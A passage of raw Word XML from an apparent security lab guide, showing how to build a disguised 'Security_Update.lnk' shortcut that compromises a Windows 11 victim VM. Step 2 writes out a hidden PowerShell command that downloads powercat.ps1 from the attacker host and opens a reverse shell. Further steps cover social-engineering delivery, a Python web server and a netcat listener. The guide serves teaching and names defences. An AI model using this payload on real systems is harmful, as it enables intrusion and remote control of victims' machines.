          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>systeminfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F00D26">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>, and ipconfig.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B86074A" w14:textId="77777777" w:rsidR="00AB1F43" w:rsidRPr="00F00D26" w:rsidRDefault="00AB1F43" w:rsidP="00AB1F43">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F00D26">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>This lab highlights how attackers combine social engineering, PowerShell, and shortcut files to compromise systems. It also emphasizes the importance of restricting PowerShell, monitoring outbound connections, implementing Endpoint Detection and Response (EDR), and educating users to avoid opening suspicious files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD284DE" w14:textId="77777777" w:rsidR="00AB1F43" w:rsidRPr="00F00D26" w:rsidRDefault="00AB1F43" w:rsidP="00AB1F43">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F00D26">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Note:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F00D26">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  In this lab, we use three virtual machines: Kali Linux, Windows Server 2025, and Windows 11. The Kali Linux, as an attacker machine, has an IP address of </w:t>
      </w:r>
      <w:r w:rsidRPr="00F00D26">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>192.168.100.20</w:t>
      </w:r>
      <w:r w:rsidRPr="00F00D26">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>. The Windows Server 2025 is used to create a .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F00D26">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>lnk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F00D26">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> shortcut. Windows 11 is a victim machine. When you perform this lab, use your virtual machine IP addresses, not the lab IP addresses.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9017"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AB1F43" w:rsidRPr="00F00D26" w14:paraId="61306DED" w14:textId="77777777" w:rsidTr="009A3A3B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9017" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="6A3FEA19" w14:textId="77777777" w:rsidR="00AB1F43" w:rsidRPr="00F00D26" w:rsidRDefault="00AB1F43" w:rsidP="009A3A3B">
            <w:pPr>
              <w:spacing w:before="120"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">1. Turn on </w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Kali Linux,</w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Windows 11, </w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>and</w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> Windows Server 2025 </w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">virtual machines, then switch to the </w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Windows Server 2025</w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> virtual machine.  Right-click in </w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Explorer</w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">, select </w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>New</w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> &gt; </w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Shortcut</w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3104BCCA" w14:textId="77777777" w:rsidR="00AB1F43" w:rsidRPr="00F00D26" w:rsidRDefault="00AB1F43" w:rsidP="009A3A3B">
            <w:pPr>
              <w:spacing w:before="120"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19F61091" wp14:editId="0FE63AA2">
                  <wp:extent cx="4115551" cy="4277082"/>
                  <wp:effectExtent l="19050" t="19050" r="18415" b="28575"/>
                  <wp:docPr id="1517571076" name="Picture 151757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4119679" cy="4281372"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:solidFill>
                              <a:sysClr val="windowText" lastClr="000000"/>
                            </a:solidFill>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DCB66F4" w14:textId="77777777" w:rsidR="00AB1F43" w:rsidRPr="00F00D26" w:rsidRDefault="00AB1F43" w:rsidP="009A3A3B">
            <w:pPr>
              <w:spacing w:before="120"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">2. In the location field, enter the below-provided PowerShell command for a reverse shell. Here, you need to add the IP address of the Kali Linux virtual machine. Then click on the </w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Next</w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> button.</w:t>
            </w:r>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="TableGrid"/>
              <w:tblW w:w="0" w:type="auto"/>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="8791"/>
            </w:tblGrid>
            <w:tr w:rsidR="00AB1F43" w:rsidRPr="00F00D26" w14:paraId="778E3DDB" w14:textId="77777777" w:rsidTr="009A3A3B">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="8791" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
                </w:tcPr>
                <w:p w14:paraId="1F3962C1" w14:textId="77777777" w:rsidR="00AB1F43" w:rsidRPr="00F00D26" w:rsidRDefault="00AB1F43" w:rsidP="009A3A3B">
                  <w:pPr>
                    <w:spacing w:before="120"/>
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00F00D26">
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>powershell.exe -</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00F00D26">
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>nop</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00F00D26">
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> -w hidden -c "</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r w:rsidRPr="00F00D26">
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>IEX(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r w:rsidRPr="00F00D26">
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve">New-Object System.Net.WebClient).DownloadString('http://&lt;attacker-ip&gt;:8000/powercat.ps1'); </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00F00D26">
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>powercat</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00F00D26">
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> -c &lt;attacker-</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00F00D26">
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>ip</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00F00D26">
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve">&gt; -p 443 -e </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00F00D26">
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>powershell</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00F00D26">
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve">"  </w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="26E80028" w14:textId="77777777" w:rsidR="00AB1F43" w:rsidRPr="00F00D26" w:rsidRDefault="00AB1F43" w:rsidP="009A3A3B">
            <w:pPr>
              <w:spacing w:before="120"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2D5AD347" w14:textId="77777777" w:rsidR="00AB1F43" w:rsidRPr="00F00D26" w:rsidRDefault="00AB1F43" w:rsidP="009A3A3B">
            <w:pPr>
              <w:spacing w:before="120"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E6415EC" wp14:editId="30A9B3A3">
                  <wp:extent cx="4295775" cy="3176028"/>
                  <wp:effectExtent l="19050" t="19050" r="9525" b="24765"/>
                  <wp:docPr id="1517571077" name="Picture 151757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4298934" cy="3178363"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:solidFill>
                              <a:sysClr val="windowText" lastClr="000000"/>
                            </a:solidFill>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="10680EFB" w14:textId="77777777" w:rsidR="00AB1F43" w:rsidRPr="00F00D26" w:rsidRDefault="00AB1F43" w:rsidP="009A3A3B">
            <w:pPr>
              <w:spacing w:before="120"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">3. Enter the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Security_Update</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> in the name field. Click on the </w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Finish</w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> button. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="031371E7"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795D30D4" wp14:editId="07273333">
                  <wp:extent cx="4314825" cy="3190112"/>
                  <wp:effectExtent l="19050" t="19050" r="9525" b="10795"/>
                  <wp:docPr id="1517571078" name="Picture 151757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4321828" cy="3195289"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:solidFill>
                              <a:sysClr val="windowText" lastClr="000000"/>
                            </a:solidFill>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C055FAC" w14:textId="77777777" w:rsidR="00AB1F43" w:rsidRPr="00F00D26" w:rsidRDefault="00AB1F43" w:rsidP="009A3A3B">
            <w:pPr>
              <w:spacing w:before="120"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">4. Use any social engineering tactic to send the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Security_Update.lnk</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> file or send it via a shared folder on the Windows 11 victim virtual machine.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1533F82C" w14:textId="77777777" w:rsidR="00AB1F43" w:rsidRPr="00F00D26" w:rsidRDefault="00AB1F43" w:rsidP="009A3A3B">
            <w:pPr>
              <w:spacing w:before="120"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05E3DA83" wp14:editId="114282CC">
                  <wp:extent cx="4152900" cy="1800648"/>
                  <wp:effectExtent l="19050" t="19050" r="19050" b="28575"/>
                  <wp:docPr id="1517571079" name="Picture 151757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4157484" cy="1802635"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:solidFill>
                              <a:sysClr val="windowText" lastClr="000000"/>
                            </a:solidFill>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="05C45A53" w14:textId="77777777" w:rsidR="00AB1F43" w:rsidRPr="00F00D26" w:rsidRDefault="00AB1F43" w:rsidP="009A3A3B">
            <w:pPr>
              <w:spacing w:before="120"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">5. Switch to the </w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Kali Linux</w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> virtual machine. Open the Terminal and execute the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>su</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> command to run programs with root privileges. Then execute the</w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">following command: </w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">python3 -m </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>http.server</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> 8000 </w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">to host powercat.ps1 (a PowerShell </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>netcat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> alternative) on a simple web server.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58C9C751"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3FA09038" wp14:editId="0DC99275">
                  <wp:extent cx="4257675" cy="1112174"/>
                  <wp:effectExtent l="19050" t="19050" r="9525" b="12065"/>
                  <wp:docPr id="1517571080" name="Picture 151757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4275983" cy="1116956"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:solidFill>
                              <a:sysClr val="windowText" lastClr="000000"/>
                            </a:solidFill>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FF04BDC" w14:textId="77777777" w:rsidR="00AB1F43" w:rsidRPr="00F00D26" w:rsidRDefault="00AB1F43" w:rsidP="009A3A3B">
            <w:pPr>
              <w:spacing w:before="120"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">6. Execute the following command: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>nc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>lvnp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> 443</w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> to connect back to your listener</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="509B242B"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09044B61" wp14:editId="04CC768C">
                  <wp:extent cx="4010025" cy="1102357"/>
                  <wp:effectExtent l="19050" t="19050" r="9525" b="22225"/>
                  <wp:docPr id="1517571081" name="Picture 151757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4011405" cy="1102736"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:solidFill>
                              <a:sysClr val="windowText" lastClr="000000"/>
                            </a:solidFill>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="6AC75904" w14:textId="77777777" w:rsidR="00AB1F43" w:rsidRPr="00F00D26" w:rsidRDefault="00AB1F43" w:rsidP="009A3A3B">
            <w:pPr>
              <w:spacing w:before="120"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">7. As the victim double-clicks on the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Security_Update.lnk</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> file triggers the PowerShell.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CAECEA8"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32EC9614" wp14:editId="3946401A">
                  <wp:extent cx="4276725" cy="1339823"/>
                  <wp:effectExtent l="19050" t="19050" r="9525" b="13335"/>
                  <wp:docPr id="1517571082" name="Picture 151757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extLst>
                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                              </a:ext>
                            </a:extLst>
                          </a:blip>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4289326" cy="1343771"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:solidFill>
                              <a:sysClr val="windowText" lastClr="000000"/>
                            </a:solidFill>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="593B0BED" w14:textId="77777777" w:rsidR="00AB1F43" w:rsidRPr="00F00D26" w:rsidRDefault="00AB1F43" w:rsidP="009A3A3B">
            <w:pPr>
              <w:spacing w:before="120"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">8. Execute the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
